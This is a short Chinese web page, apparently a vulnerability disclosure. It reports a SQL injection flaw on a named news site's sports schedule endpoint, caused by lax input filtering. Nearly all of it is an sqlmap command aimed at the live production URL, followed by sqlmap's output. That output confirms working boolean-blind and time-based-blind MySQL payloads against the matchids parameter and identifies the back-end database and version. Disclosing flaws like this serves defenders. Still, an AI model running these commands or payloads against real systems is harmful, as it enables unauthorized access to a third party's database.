时间:2021-07-01 10:21:17 帮助过:19人阅读
sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“ 过滤不严导致注入。
G:/python/sqlmap>sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?
format=js&matchids="
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 00:48:09
[00:48:09] [WARNING] using 'C:/Documents and Settings/mm/.sqlmap/output' as the
output directory
[00:48:09] [INFO] resuming back-end DBMS 'mysql'
[00:48:09] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.ifeng.com'. Do you want to follow? [Y/n
] y
[00:48:14] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: matchids
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: format=js&matchids=-5547 OR (5410=5410)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: format=js&matchids=-5830 OR 5843=SLEEP(5)
---
[00:48:20] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“
Place: GET
Parameter: matchids
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: format=js&matchids=-5547 OR (5410=5410)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: format=js&matchids=-5830 OR 5843=SLEEP(5)
---
过滤。